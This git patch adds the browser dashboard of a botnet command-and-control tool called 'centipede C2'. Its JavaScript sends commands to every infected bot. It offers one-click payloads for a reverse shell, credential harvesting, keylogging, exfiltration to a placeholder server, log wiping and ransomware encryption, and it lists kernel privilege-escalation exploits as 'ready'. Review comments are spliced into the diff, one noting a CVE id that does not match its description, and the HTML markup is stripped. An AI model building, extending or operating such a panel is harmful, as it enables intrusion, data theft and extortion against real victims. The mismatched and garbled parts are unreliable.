From b1738253fbc8c2ace2b50d2f4243e4b78b8ece8d Mon Sep 17 00:00:00 2001
From: ek0ms savi0r
Date: Sun, 31 May 2026 04:04:11 +0000
Subject: [PATCH] Upload files to "/"
---
 app.js | 327 +++++++++++++++++++++++++++++++++++++++++++
 dark.css | 402 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 index.html | 161 +++++++++++++++++++++
 3 files changed, 890 insertions(+)
 create mode 100644 app.js
 create mode 100644 dark.css
 create mode 100644 index.html
diff --git a/app.js b/app.js
new file mode 100644
index 0000000..f71ee2c
--- /dev/null
+++ b/app.js
@@ -0,0 +1,327 @@
+const API = '/api';
+let ws = null;
+let bots = {};
+let commands = {};
+
+// Initialize
+document.addEventListener('DOMContentLoaded', () => {
+ loadStats();
+ loadBots();
+ loadCommands();
+ loadPayloads();
+ loadExploits();
+
+ // Navigation
+ document.querySelectorAll('.nav-links li').forEach(li => {
+ li.addEventListener('click', () => {
+ document.querySelectorAll('.nav-links li').forEach(l => l.classList.remove('active'));
+ li.classList.add('active');
+ document.querySelectorAll('.view').forEach(v => v.classList.remove('active'));
+ document.getElementById('view-' + li.dataset.view).classList.add('active');
+ });
+ });
+
+ // Refresh
+ document.getElementById('btn-refresh').addEventListener('click', () => {
+ loadStats(); loadBots();
+ });
+
+ // Quick command
+ document.getElementById('btn-send-cmd').addEventListener('click', sendQuickCommand);
+
+ // Command all
+ document.getElementById('btn-command-all').addEventListener('click', () => {
+ showCommandModal('all');
+ });
+
+ // Broadcast
+ document.getElementById('btn-broadcast').addEventListener('click', () => {
+ showCommandModal('all');
+ });
+
+ // Search
+ document.getElementById('bot-search').addEventListener('keyup', filterBots);
+
+ // Auto-refresh
+ setInterval(loadStats, 10000);
+ setInterval(loadBots, 15000);
+
+ // Connect to WebSocket for live updates
+ connectWS();
+});
+
+function connectWS() {
+ const protocol = window.location.protocol === 'https:' ? 
'wss:' : 'ws:'; + ws = new WebSocket(`${protocol}//${window.location.host}/ws`); + + ws.onopen = () => { + addActivity('system', 'WebSocket connected'); + }; + + ws.onmessage = (event) => { + try { + const data = JSON.parse(event.data); + handleWSMessage(data); + } catch(e) {} + }; + + ws.onclose = () => { + addActivity('system', 'WebSocket disconnected, reconnecting...'); + setTimeout(connectWS, 5000); + }; +} + +function handleWSMessage(data) { + switch(data.t) { + case 'bot_register': + addActivity('bot', `New bot: ${data.hostname} (${data.bid.slice(0,8)})`); + break; + case 'bot_result': + addActivity('result', `[${data.bid.slice(0,8)}] ${data.out ? data.out.slice(0,80) : 'completed'}`); + break; + } +} + +function addActivity(type, message) { + const log = document.getElementById('activity-log'); + const entry = document.createElement('div'); + entry.className = 'activity-entry'; + const time = new Date().toLocaleTimeString(); + entry.innerHTML = `[${time}] ${type} ${escapeHTML(message)}`; + log.insertBefore(entry, log.firstChild); + while (log.children.length > 100) log.removeChild(log.lastChild); +} + +function escapeHTML(str) { + return str.replace(/&/g,'&').replace(//g,'>'); +} + +// Stats +async function loadStats() { + try { + const r = await fetch(`${API}/stats`); + const stats = await r.json(); + document.getElementById('total-bots').textContent = stats.total_bots; + document.getElementById('connected-bots').textContent = stats.connected; + document.getElementById('root-bots').textContent = stats.root_bots; + } catch(e) {} +} + +// Bots +async function loadBots() { + try { + const r = await fetch(`${API}/bots`); + const list = await r.json(); + bots = {}; + list.forEach(b => { bots[b.id] = b; }); + renderBots(); + } catch(e) {} +} + +function renderBots() { + const tbody = document.getElementById('bot-list'); + tbody.innerHTML = ''; + Object.values(bots).forEach(b => { + const tr = document.createElement('tr'); + const status = b.connected ? 
'online' : 'offline'; + tr.innerHTML = ` + ${b.id.slice(0,12)}... + ${escapeHTML(b.hostname)} + ${b.ip || '-'} + ${b.os || '-'}/${b.arch || '-'} + ${b.kernel ? b.kernel.slice(0,30) : '-'} + ${status} + ${b.privilege || 'user'} + L${b.layer + 1} + + + + + `; + tbody.appendChild(tr); + }); + + // Tag inputs + document.querySelectorAll('.tag-input').forEach(inp => { + inp.addEventListener('change', async (e) => { + const botId = e.target.dataset.bot; + const tag = e.target.value; + await fetch(`${API}/bots/${botId}/tag`, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify({tag}) + }); + }); + }); +} + +function filterBots() { + const q = document.getElementById('bot-search').value.toLowerCase(); + document.querySelectorAll('#bot-list tr').forEach(tr => { + tr.style.display = tr.textContent.toLowerCase().includes(q) ? '' : 'none'; + }); +} + +// Commands +async function loadCommands() { + try { + const r = await fetch(`${API}/commands`); + const list = await r.json(); + commands = {}; + list.forEach(c => { commands[c.id] = c; }); + renderCommands(); + } catch(e) {} +} + +function renderCommands() { + const tbody = document.getElementById('cmd-list'); + tbody.innerHTML = ''; + Object.values(commands).slice(0, 100).forEach(c => { + const tr = document.createElement('tr'); + tr.innerHTML = ` + ${c.id.slice(0,8)} + ${c.target} + ${escapeHTML(c.action)} + ${c.status} + ${c.result ? escapeHTML(c.result.slice(0,60)) : '-'} + ${new Date(c.created_at).toLocaleTimeString()} + `; + tbody.appendChild(tr); + }); +} + +async function sendCommand(target, action, args) { + const body = { + bot_id: target === 'all' ? 
'' : target, + action: action, + args: args || '' + }; + await fetch(`${API}/command`, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify(body) + }); + addActivity('command', `${action} -> ${target}`); + setTimeout(loadCommands, 1000); +} + +function sendQuickCommand() { + const action = document.getElementById('cmd-action').value; + const args = document.getElementById('cmd-args').value; + sendCommand('all', action, args); +} + +function showCommandModal(target) { + const overlay = document.createElement('div'); + overlay.className = 'modal-overlay'; + overlay.innerHTML = ` + + `; + document.body.appendChild(overlay); +} + +async function doSendModal(target) { + const action = document.getElementById('modal-action').value; + const args = document.getElementById('modal-args').value; + const overlay = document.querySelector('.modal-overlay'); + if (overlay) overlay.remove(); + await sendCommand(target, action, args); +} + +// Payloads +function loadPayloads() { + const payloads = [ + {name: 'Reverse Shell', desc: 'Spawn reverse or bind shell on target', action: 'payload', args: '{"name":"reverse_shell","host":"YOUR_IP","port":"4444"}'}, + {name: 'Persistence', desc: 'Install via systemd, cron, .bashrc hooks, and LD_PRELOAD', action: 'payload', args: '{"name":"persist"}'}, + {name: 'Credential Harvest', desc: 'Extract /etc/shadow, SSH keys, env vars, DB configs, cloud creds', action: 'payload', args: '{"name":"harvest"}'}, + {name: 'Lateral Movement', desc: 'Inject SSH keys, scan known_hosts, discover PSSH/Ansible infrastructure', action: 'payload', args: '{"name":"lateral"}'}, + {name: 'Network Pivot', desc: 'Enable IP forwarding, SOCKS proxy, NAT masquerade', action: 'payload', args: '{"name":"pivot","port":"1080"}'}, + {name: 'Keylogger', desc: 'Capture keystrokes from /dev/input devices', action: 'payload', args: '{"name":"keylog"}'}, + {name: 'Packet Sniff', desc: 'Capture network traffic with tcpdump', action: 'payload', 
args: '{"name":"sniff","interface":"eth0","filter":"port 80"}'}, + {name: 'System Enum', desc: 'Full system enumeration: kernel, users, network, docker, k8s, cloud', action: 'payload', args: '{"name":"enum"}'}, + {name: 'Data Exfil', desc: 'Exfiltrate binary and harvested data via HTTP POST', action: 'payload', args: '{"name":"exfil","target":"http://YOUR_SERVER","method":"http"}'}, + {name: 'Forensic Wipe', desc: 'Clear logs, history, journal, auditd, wtmp, randomize MAC', action: 'payload', args: '{"name":"wipe"}'}, + {name: 'Ransomware', desc: 'AES-256-GCM file encryption with operator-defined key. Specify key in args or let it generate one.', action: 'payload', args: '{"name":"ransomware","key":"","dirs":"/home,/root,/var/www"}'}, + {name: 'Ransomware Decrypt', desc: 'Decrypt .centipede files using the same key used for encryption.', action: 'payload', args: '{"name":"ransomware_decrypt","key":"YOUR_HEX_KEY"}'}, + {name: 'Self Destruct', desc: 'Remove all traces, delete binary, and exit', action: 'payload', args: '{"name":"selfdestruct"}'}, + ]; + + const grid = document.getElementById('payload-list'); + payloads.forEach(p => { + const card = document.createElement('div'); + card.className = 'payload-card'; + card.innerHTML = `

${p.name}

${p.desc}

`; + card.addEventListener('click', () => { + document.getElementById('cmd-action').value = p.action; + document.getElementById('cmd-args').value = p.args; + addActivity('payload', `Selected: ${p.name}`); + }); + grid.appendChild(card); + }); +} + +// Exploits +function loadExploits() { + const exploits = [ + { + name: 'dirtyfrag', + cve: 'CVE-2026-43284 + CVE-2026-43500', + desc: 'xfrm-ESP + RxRPC page-cache write chain. Linux 4.x through 6.x. Required kernel modules: esp4, rxrpc.', + status: 'ready', + range: '2017 - Present' + }, + { + name: 'Dirty Pipe', + cve: 'CVE-2022-0847', + desc: 'Direct pipe write to overwrite read-only files. Linux 5.8 - 5.16.', + status: 'ready', + range: '5.8 - 5.16' + }, + { + name: 'PwnKit', + cve: 'CVE-2021-4034', + desc: 'pkexec argument parsing vulnerability. All distributions with pkexec installed.', + status: 'ready', + range: '2009 - 2022' + }, + { + name: 'GameOverlay', + cve: 'CVE-2023-3269', + desc: 'Ubuntu overlayfs LPE. Ubuntu kernels with overlayfs support.', + status: 'ready', + range: '5.x - 6.x (Ubuntu)' + }, + ]; + + const list = document.getElementById('exploit-list'); + exploits.forEach(e => { + const item = document.createElement('div'); + item.className = 'exploit-item'; + item.innerHTML = ` +

${e.name} ${e.status}

+

CVE: ${e.cve}

+

${e.desc}

+

Kernel Range: ${e.range}

+ `;
+ list.appendChild(item);
+ });
+}
diff --git a/dark.css b/dark.css
new file mode 100644
index 0000000..7acc879
--- /dev/null
+++ b/dark.css
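Review bot: In the `exploits` array of `loadExploits`, the `GameOverlay` entry pairs the id `CVE-2023-3269` with an Ubuntu overlayfs description, and as far as I know that id is assigned to a different kernel issue (the maple-tree "StackRot" bug), so the label and the description do not describe the same vulnerability. Anyone using this list to work out which hosts need patching should check each id against its CVE record rather than trusting the names shown here. I would add a comment on that entry such as `// NOTE: CVE id and description disagree; confirm against the CVE record`.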
@@ -0,0 +1,402 @@
+:root {
+ --bg-primary: #0a0a0a;
+ --bg-secondary: #111111;
+ --bg-tertiary: #1a1a1a;
+ --bg-card: #141414;
+ --text-primary: #e0e0e0;
+ --text-secondary: #888888;
+ --accent: #00ff41;
+ --accent-secondary: #ff6600;
+ --danger: #ff0033;
+ --warning: #ffaa00;
+ --border: #222222;
+ --success: #00ff41;
+ --info: #00aaff;
+}
+
+* { margin: 0; padding: 0; box-sizing: border-box; }
+
+body {
+ background: var(--bg-primary);
+ color: var(--text-primary);
+ font-family: 'Courier New', 'Consolas', monospace;
+ font-size: 14px;
+ overflow: hidden;
+ height: 100vh;
+}
+
+#app {
+ display: flex;
+ height: 100vh;
+}
+
+#sidebar {
+ width: 260px;
+ background: var(--bg-secondary);
+ border-right: 1px solid var(--border);
+ display: flex;
+ flex-direction: column;
+ padding: 20px;
+}
+
+.logo {
+ display: flex;
+ align-items: center;
+ gap: 10px;
+ margin-bottom: 24px;
+ padding-bottom: 16px;
+ border-bottom: 1px solid var(--border);
+}
+
+.logo .icon { font-size: 24px; }
+.logo h1 {
+ font-size: 20px;
+ color: var(--accent);
+ letter-spacing: 2px;
+ text-transform: uppercase;
+}
+.logo .version {
+ font-size: 10px;
+ color: var(--text-secondary);
+ margin-left: auto;
+}
+
+.nav-stats {
+ display: grid;
+ grid-template-columns: repeat(3, 1fr);
+ gap: 8px;
+ margin-bottom: 24px;
+}
+
+.stat-card {
+ background: var(--bg-tertiary);
+ border: 1px solid var(--border);
+ border-radius: 4px;
+ padding: 12px 8px;
+ text-align: center;
+}
+
+.stat-value {
+ display: block;
+ font-size: 24px;
+ font-weight: bold;
+ color: var(--accent);
+ margin-bottom: 4px;
+}
+
+.stat-label {
+ font-size: 10px;
+ color: var(--text-secondary);
+ text-transform: uppercase;
+ letter-spacing: 1px;
+}
+
+.nav-links {
+ list-style: none;
+ flex: 1;
+}
+
+.nav-links li a {
+ display: block;
+ padding: 12px 16px;
+ color: var(--text-secondary);
+ text-decoration: none;
+ border-left: 2px solid transparent;
+ transition: all 0.2s;
+ letter-spacing: 1px;
+ text-transform: uppercase;
+ font-size: 12px;
+}
+
+.nav-links li:hover a,
+.nav-links li.active a {
+ color: var(--accent);
+ border-left-color: var(--accent);
+ background: rgba(0, 255, 65, 0.05);
+}
+
+#content {
+ flex: 1;
+ padding: 24px;
+ overflow-y: auto;
+}
+
+.view { display: none; }
+.view.active { display: block; }
+
+.view-header {
+ display: flex;
+ justify-content: space-between;
+ align-items: center;
+ margin-bottom: 24px;
+}
+
+.view-header h2 {
+ font-size: 18px;
+ color: var(--text-primary);
+ letter-spacing: 2px;
+ text-transform: uppercase;
+}
+
+.header-controls {
+ display: flex;
+ gap: 8px;
+ align-items: center;
+}
+
+/* Buttons */
+.btn {
+ background: var(--bg-tertiary);
+ border: 1px solid var(--border);
+ color: var(--text-primary);
+ padding: 8px 16px;
+ cursor: pointer;
+ font-family: inherit;
+ font-size: 12px;
+ letter-spacing: 1px;
+ text-transform: uppercase;
+ transition: all 0.2s;
+}
+
+.btn:hover {
+ border-color: var(--accent);
+ color: var(--accent);
+}
+
+.btn-accent {
+ background: var(--accent);
+ color: var(--bg-primary);
+ border-color: var(--accent);
+ font-weight: bold;
+}
+
+.btn-accent:hover {
+ background: transparent;
+ color: var(--accent);
+}
+
+.btn-danger {
+ background: var(--danger);
+ color: #fff;
+ border-color: var(--danger);
+}
+
+.btn-danger:hover {
+ background: transparent;
+ color: var(--danger);
+}
+
+/* Panels */
+.dashboard-grid {
+ display: grid;
+ grid-template-columns: 2fr 1fr;
+ gap: 16px;
+}
+
+.panel {
+ background: var(--bg-card);
+ border: 1px solid var(--border);
+ border-radius: 4px;
+ margin-bottom: 16px;
+}
+
+.panel-header {
+ padding: 12px 16px;
+ border-bottom: 1px solid var(--border);
+ font-size: 12px;
+ letter-spacing: 2px;
+ text-transform: uppercase;
+ color: var(--accent);
+}
+
+.panel-body { padding: 16px; }
+
+/* Inputs */
+.input {
+ background: var(--bg-primary);
+ border: 1px solid var(--border);
+ color: var(--text-primary);
+ padding: 8px 12px;
+ font-family: inherit;
+ font-size: 13px;
+ width: 100%;
+ margin-bottom: 8px;
+}
+
+.input:focus {
+ outline: none;
+ border-color: var(--accent);
+}
+
+select.input {
+ cursor: pointer;
+}
+
+/* Tables */
+table {
+ width: 100%;
+ border-collapse: collapse;
+}
+
+th, td {
+ padding: 10px 12px;
+ text-align: left;
+ border-bottom: 1px solid var(--border);
+ font-size: 12px;
+}
+
+th {
+ color: var(--accent);
+ letter-spacing: 1px;
+ text-transform: uppercase;
+ font-size: 11px;
+}
+
+tr:hover td {
+ background: rgba(0, 255, 65, 0.03);
+}
+
+/* Status indicators */
+.status-online { color: var(--success); }
+.status-offline { color: var(--text-secondary); }
+.status-pending { color: var(--warning); }
+.status-completed { color: var(--success); }
+.status-failed { color: var(--danger); }
+
+.layer-dot {
+ display: inline-block;
+ width: 8px;
+ height: 8px;
+ border-radius: 50%;
+ margin-right: 4px;
+ margin-left: 12px;
+}
+.layer-dot:first-child { margin-left: 0; }
+.layer-dot.green { background: var(--success); }
+.layer-dot.gray { background: var(--text-secondary); }
+
+/* Payload grid */
+.payload-grid {
+ display: grid;
+ grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
+ gap: 12px;
+ padding: 8px;
+}
+
+.payload-card {
+ background: var(--bg-card);
+ border: 1px solid var(--border);
+ border-radius: 4px;
+ padding: 16px;
+ cursor: pointer;
+ transition: all 0.2s;
+}
+
+.payload-card:hover {
+ border-color: var(--accent);
+ transform: translateY(-2px);
+}
+
+.payload-card h3 {
+ color: var(--accent);
+ font-size: 14px;
+ margin-bottom: 8px;
+ letter-spacing: 1px;
+ text-transform: uppercase;
+}
+
+.payload-card p {
+ color: var(--text-secondary);
+ font-size: 12px;
+ line-height: 1.5;
+}
+
+/* Scrollbar */
+::-webkit-scrollbar { width: 6px; }
+::-webkit-scrollbar-track { background: var(--bg-primary); }
+::-webkit-scrollbar-thumb { background: var(--border); }
+::-webkit-scannerbar-thumb:hover { background: var(--accent); }
+
+/* Activity log */
+#activity-log {
+ max-height: 300px;
+ overflow-y: 
auto; + font-size: 11px; +} + +.activity-entry { + padding: 6px 0; + border-bottom: 1px solid rgba(255,255,255,0.05); + color: var(--text-secondary); +} + +.activity-entry .time { color: var(--text-secondary); } +.activity-entry .event { color: var(--accent); } + +/* Exploit items */ +.exploit-item { + background: var(--bg-tertiary); + border: 1px solid var(--border); + border-radius: 4px; + padding: 16px; + margin-bottom: 8px; +} + +.exploit-item h4 { + color: var(--accent-secondary); + margin-bottom: 8px; + letter-spacing: 1px; +} + +.exploit-item .status { + display: inline-block; + padding: 2px 8px; + font-size: 10px; + text-transform: uppercase; + letter-spacing: 1px; + border-radius: 2px; +} + +.exploit-item .status.ready { background: rgba(0,255,65,0.1); color: var(--success); } +.exploit-item .status.pending { background: rgba(255,170,0,0.1); color: var(--warning); } + +/* Layer info layout */ +.layer-info { + display: flex; + flex-direction: column; + gap: 6px; + font-size: 12px; +} + +/* Modal */ +.modal-overlay { + position: fixed; + top: 0; left: 0; right: 0; bottom: 0; + background: rgba(0,0,0,0.8); + display: flex; + align-items: center; + justify-content: center; + z-index: 100; +} + +.modal { + background: var(--bg-secondary); + border: 1px solid var(--border); + border-radius: 4px; + padding: 24px; + min-width: 400px; +} + +.modal h3 { + color: var(--accent); + margin-bottom: 16px; + letter-spacing: 1px; + text-transform: uppercase; +} + +.modal-actions { + display: flex; + gap: 8px; + justify-content: flex-end; + margin-top: 16px; +} diff --git a/index.html b/index.html new file mode 100644 index 0000000..3f8aad0 --- /dev/null +++ b/index.html @@ -0,0 +1,161 @@ + + + + + + centipede C2 + + + +
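Review bot: The selector `::-webkit-scannerbar-thumb:hover` in the Scrollbar section is not a known pseudo-element, so the browser discards the rule and the thumb hover colour never applies. It looks like a typo for the selector used on the three lines above it: `::-webkit-scrollbar-thumb:hover { background: var(--accent); }`.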
+ + +
+ +
+
+

Dashboard

+
+ + +
+
+
+
+
Bot Activity
+
+
+
+
+
+
Quick Command
+
+ + + +
+
+
+
C2 Layer Status
+
+
+ WebSocket + DNS Tunnel + Discord + ICMP +
+
+
+
+
+ + +
+
+

Bots

+
+ + +
+
+
+
+ + + + + + + + + + + + + + + + +
IDHostnameIPOS/ArchKernelStatusPrivilegeLayerTagActions
+
+
+
+ + +
+
+

Command History

+
+
+
+ + + + + +
IDTargetActionStatusResultTime
+
+
+
+ + +
+
+

Payload Suite

+
+
+
+ + +
+
+

Exploit Arsenal

+
+
+
+
+
+
+
+ + + +